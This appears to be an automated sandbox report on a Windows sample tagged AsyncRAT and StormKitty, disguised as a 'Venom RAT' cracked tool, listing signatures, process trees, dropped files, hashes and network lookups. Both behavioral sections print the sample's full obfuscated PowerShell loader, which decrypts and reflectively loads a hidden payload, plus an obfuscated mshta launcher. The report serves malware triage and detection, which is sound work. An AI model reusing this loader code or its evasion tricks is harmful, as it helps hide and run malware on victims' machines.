Malware Analysis Report

2024-09-23 03:10

Sample ID 240323-ba892sbc56
Target 35dd1e24b5d7024c28d728aa28146f910c0b9832b5dff75ce5e972b5a6f414c5
SHA256 35dd1e24b5d7024c28d728aa28146f910c0b9832b5dff75ce5e972b5a6f414c5
Tags
rat default asyncrat stormkitty
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

35dd1e24b5d7024c28d728aa28146f910c0b9832b5dff75ce5e972b5a6f414c5

Threat Level: Known bad

The file 35dd1e24b5d7024c28d728aa28146f910c0b9832b5dff75ce5e972b5a6f414c5 was found to be: Known bad.

Malicious Activity Summary

rat default asyncrat stormkitty

Asyncrat family

StormKitty payload

Async RAT payload

Stormkitty family

AsyncRat

Executes dropped EXE

Checks computer location settings

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-03-23 00:58

Signatures

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A (4 matches reported, all fields N/A)

Asyncrat family

asyncrat

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

Stormkitty family

stormkitty

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A (54 matches reported, all fields N/A)

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-23 00:57

Reported

2024-04-15 16:08

Platform

win10-20240404-en

Max time kernel

21s

Max time network

18s

Command Line

"C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe"

Signatures

AsyncRat

rat asyncrat

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation C:\Windows\$sxr-mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe N/A
N/A N/A C:\Windows\$sxr-mshta.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\$sxr-mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\$sxr-mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\$sxr-cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\$sxr-cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\$sxr-powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\$sxr-powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance C:\Windows\$sxr-mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe

"C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Venom.bat" "

C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe

"C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function ztZFv($NRwiA){ $nQAla=[System.Security.Cryptography.Aes]::Create(); $nQAla.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nQAla.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nQAla.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('QdoYxUkiCqDUKhWwrTH7AerfcIF5j7b/N2RWKPLtoYY='); $nQAla.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('odLQJwhJTyobsFXcB4hGIA=='); $gHZYb=$nQAla.CreateDecryptor(); $return_var=$gHZYb.TransformFinalBlock($NRwiA, 0, $NRwiA.Length); $gHZYb.Dispose(); $nQAla.Dispose(); $return_var;}function RqfAN($NRwiA){ $eThoy=New-Object System.IO.MemoryStream(,$NRwiA); $sppNM=New-Object System.IO.MemoryStream; Invoke-Expression '$TwzvL #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$eThoy,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $TwzvL.CopyTo($sppNM); $TwzvL.Dispose(); $eThoy.Dispose(); $sppNM.Dispose(); $sppNM.ToArray();}function mReVh($NRwiA,$dHouc){ $RXzAR = @( '$nUQVd = [System.Reflection.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$NRwiA);', '$TAeyG = $nUQVd.EntryPoint;', '$TAeyG.Invoke($null, $dHouc);' ); foreach ($CnxNU in $RXzAR) { Invoke-Expression $CnxNU };}$DsIiH=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Roaming\Venom.bat').Split([Environment]::NewLine);foreach ($REdJF in $DsIiH) { if ($REdJF.StartsWith('SEROXEN')) { $LHnvh=$REdJF.Substring(7); break; }}$AShmJ=RqfAN (ztZFv ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($LHnvh)));mReVh $AShmJ (,[string[]] ('C:\Users\Admin\AppData\Roaming\Venom.bat')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden

C:\Windows\$sxr-mshta.exe

C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-fcYQxVhvEiaGdINTAJQc4312:JJRWgfrr=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"

C:\Windows\$sxr-cmd.exe

"C:\Windows\$sxr-cmd.exe" /c %$sxr-fcYQxVhvEiaGdINTAJQc4312:JJRWgfrr=%

Network

Country Destination Domain Proto
US 8.8.8.8:53 25.251.17.2.in-addr.arpa udp

Files

memory/4660-0-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

memory/4660-1-0x0000000000630000-0x000000000205A000-memory.dmp

memory/4660-2-0x000000001CBF0000-0x000000001CC00000-memory.dmp

C:\Users\Admin\AppData\Roaming\Venom.bat

MD5 04fd97b8a5d2132eee84f856ee0fa938
SHA1 0d1d515140d76fcd9a2dc7f08f9d7a7d9f8d691a
SHA256 bb33e3c94abeda061b89a1d70d2430b74fcc40a81b09c732878939308a676e49
SHA512 e5b4e624343b3e9bec048c894ba681a44d8e71735c03445c361f059dc0aeb53afabeee37bb82ea9ad47187d305ecf28c1b6e46a039a1630da08e2488edb00778

C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe

MD5 3b3a304c6fc7a3a1d9390d7cbff56634
SHA1 e8bd5244e6362968f5017680da33f1e90ae63dd7
SHA256 7331368c01b2a16bda0f013f376a039e6aeb4cb2dd8b0c2afc7ca208fb544c58
SHA512 7f1beacb6449b3b3e108016c8264bb9a21ecba526c2778794f16a7f9c817c0bbd5d4cf0c208d706d25c54322a875da899ab047aab1e07684f6b7b6083981abe5

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Venom RAT + HVNC + Stealer + Grabber.exe.log

MD5 16c5fce5f7230eea11598ec11ed42862
SHA1 75392d4824706090f5e8907eee1059349c927600
SHA256 87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151
SHA512 153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc

memory/884-15-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

memory/4660-14-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

memory/884-16-0x0000012A58AF0000-0x0000012A59924000-memory.dmp

memory/4592-23-0x000002031B460000-0x000002031B470000-memory.dmp

memory/4592-22-0x000002031B460000-0x000002031B470000-memory.dmp

memory/4592-21-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

memory/4592-24-0x000002031B610000-0x000002031B632000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3xefsshr.jwv.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4592-53-0x000002031B7B0000-0x000002031B7EC000-memory.dmp

memory/4592-64-0x000002031BC20000-0x000002031BC96000-memory.dmp

memory/4592-73-0x000002031B460000-0x000002031B470000-memory.dmp

memory/4592-74-0x0000020364210000-0x0000020364AA8000-memory.dmp

memory/4592-79-0x00007FFF22F60000-0x00007FFF2300E000-memory.dmp

memory/4592-80-0x00007FFF257B0000-0x00007FFF2598B000-memory.dmp

memory/4592-81-0x00007FFF257B0000-0x00007FFF2598B000-memory.dmp

memory/4592-83-0x00007FFF257B0000-0x00007FFF2598B000-memory.dmp

memory/884-82-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

memory/4592-84-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

memory/4592-85-0x00007FFF257B0000-0x00007FFF2598B000-memory.dmp

memory/4592-86-0x000002031BCA0000-0x000002031C76A000-memory.dmp

memory/4592-87-0x000002031B850000-0x000002031B8EA000-memory.dmp

memory/4592-102-0x000002031C770000-0x000002031C7C2000-memory.dmp

memory/4592-103-0x000002031C7C0000-0x000002031C818000-memory.dmp

memory/4592-104-0x000002031B780000-0x000002031B7AE000-memory.dmp

memory/4592-119-0x000002031B460000-0x000002031B470000-memory.dmp

memory/4592-247-0x000002031B2C0000-0x000002031B2C8000-memory.dmp

memory/4592-251-0x0000000180000000-0x0000000180009000-memory.dmp

C:\Windows\$sxr-mshta.exe

MD5 98447a7f26ee9dac6b806924d6e21c90
SHA1 a67909346a56289b7087821437efcaa51da3b083
SHA256 c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed
SHA512 c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b

memory/4592-359-0x000002031B460000-0x000002031B470000-memory.dmp

C:\Windows\$sxr-cmd.exe

MD5 94912c1d73ade68f2486ed4d8ea82de6
SHA1 524ab0a40594d2b5f620f542e87a45472979a416
SHA256 9f7ebb79def0bf8cccb5a902db11746375af3fe618355fe5a69c69e4bcd50ac9
SHA512 f48a3b7a2e6426c0091bb159599921b8e4644c8ae83a2a2a82efc9d3e21e4e343d77339917d8aabed6d8025142a2a8e74bf1fa759edb6146bc6e39fbece9e05d

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-23 00:57

Reported

2024-04-15 16:08

Platform

win10v2004-20240412-en

Max time kernel

58s

Max time network

66s

Command Line

"C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe"

Signatures

AsyncRat

rat asyncrat

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe

"C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Venom.bat" "

C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe

"C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function ztZFv($NRwiA){ $nQAla=[System.Security.Cryptography.Aes]::Create(); $nQAla.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nQAla.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nQAla.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('QdoYxUkiCqDUKhWwrTH7AerfcIF5j7b/N2RWKPLtoYY='); $nQAla.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('odLQJwhJTyobsFXcB4hGIA=='); $gHZYb=$nQAla.CreateDecryptor(); $return_var=$gHZYb.TransformFinalBlock($NRwiA, 0, $NRwiA.Length); $gHZYb.Dispose(); $nQAla.Dispose(); $return_var;}function RqfAN($NRwiA){ $eThoy=New-Object System.IO.MemoryStream(,$NRwiA); $sppNM=New-Object System.IO.MemoryStream; Invoke-Expression '$TwzvL #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$eThoy,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $TwzvL.CopyTo($sppNM); $TwzvL.Dispose(); $eThoy.Dispose(); $sppNM.Dispose(); $sppNM.ToArray();}function mReVh($NRwiA,$dHouc){ $RXzAR = @( '$nUQVd = [System.Reflection.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$NRwiA);', '$TAeyG = $nUQVd.EntryPoint;', '$TAeyG.Invoke($null, $dHouc);' ); foreach ($CnxNU in $RXzAR) { Invoke-Expression $CnxNU };}$DsIiH=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Roaming\Venom.bat').Split([Environment]::NewLine);foreach ($REdJF in $DsIiH) { if ($REdJF.StartsWith('SEROXEN')) { $LHnvh=$REdJF.Substring(7); break; }}$AShmJ=RqfAN (ztZFv ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($LHnvh)));mReVh $AShmJ (,[string[]] ('C:\Users\Admin\AppData\Roaming\Venom.bat')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 24.121.18.2.in-addr.arpa udp

Files

memory/4956-0-0x00007FFEB5040000-0x00007FFEB5B01000-memory.dmp

memory/4956-1-0x0000000000780000-0x00000000021AA000-memory.dmp

memory/4956-2-0x000000001CF10000-0x000000001CF20000-memory.dmp

C:\Users\Admin\AppData\Roaming\Venom.bat

MD5 04fd97b8a5d2132eee84f856ee0fa938
SHA1 0d1d515140d76fcd9a2dc7f08f9d7a7d9f8d691a
SHA256 bb33e3c94abeda061b89a1d70d2430b74fcc40a81b09c732878939308a676e49
SHA512 e5b4e624343b3e9bec048c894ba681a44d8e71735c03445c361f059dc0aeb53afabeee37bb82ea9ad47187d305ecf28c1b6e46a039a1630da08e2488edb00778

C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe

MD5 3b3a304c6fc7a3a1d9390d7cbff56634
SHA1 e8bd5244e6362968f5017680da33f1e90ae63dd7
SHA256 7331368c01b2a16bda0f013f376a039e6aeb4cb2dd8b0c2afc7ca208fb544c58
SHA512 7f1beacb6449b3b3e108016c8264bb9a21ecba526c2778794f16a7f9c817c0bbd5d4cf0c208d706d25c54322a875da899ab047aab1e07684f6b7b6083981abe5

memory/4956-20-0x00007FFEB5040000-0x00007FFEB5B01000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Venom RAT + HVNC + Stealer + Grabber.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

memory/1784-21-0x00007FFEB5040000-0x00007FFEB5B01000-memory.dmp

memory/1784-22-0x000002242B240000-0x000002242C074000-memory.dmp

memory/1784-23-0x00007FFEB5040000-0x00007FFEB5B01000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tpcs2kwo.ga1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5052-34-0x000001DBBBFF0000-0x000001DBBC012000-memory.dmp

memory/5052-29-0x00007FFEB50F0000-0x00007FFEB5BB1000-memory.dmp

memory/5052-36-0x000001DBB9E40000-0x000001DBB9E50000-memory.dmp

memory/5052-35-0x000001DBB9E40000-0x000001DBB9E50000-memory.dmp

memory/5052-37-0x000001DBBC3D0000-0x000001DBBC414000-memory.dmp

memory/5052-38-0x000001DBBC4A0000-0x000001DBBC516000-memory.dmp

memory/5052-39-0x000001DBF4780000-0x000001DBF5018000-memory.dmp

memory/5052-40-0x00007FFED3A40000-0x00007FFED3AFE000-memory.dmp

memory/5052-41-0x00007FFED4090000-0x00007FFED4285000-memory.dmp

memory/5052-42-0x00007FFED4090000-0x00007FFED4285000-memory.dmp

memory/5052-43-0x00007FFED4090000-0x00007FFED4285000-memory.dmp

memory/5052-44-0x00007FFEB50F0000-0x00007FFEB5BB1000-memory.dmp

memory/5052-45-0x00007FFED4090000-0x00007FFED4285000-memory.dmp